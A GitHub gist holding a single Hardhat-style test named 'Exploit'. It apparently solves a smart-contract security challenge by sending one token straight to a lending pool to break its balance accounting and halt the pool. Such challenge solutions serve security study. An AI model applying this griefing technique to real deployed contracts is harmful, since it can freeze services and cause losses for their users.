Skip to content

Instantly share code, notes, and snippets.

@az0mb13
Created January 7, 2023 13:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save az0mb13/17510e234607535d9e284f91c89b8685 to your computer and use it in GitHub Desktop.
Save az0mb13/17510e234607535d9e284f91c89b8685 to your computer and use it in GitHub Desktop.
it('Exploit', async function () {
await this.token.connect(attacker).transfer(this.pool.address, 1);
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment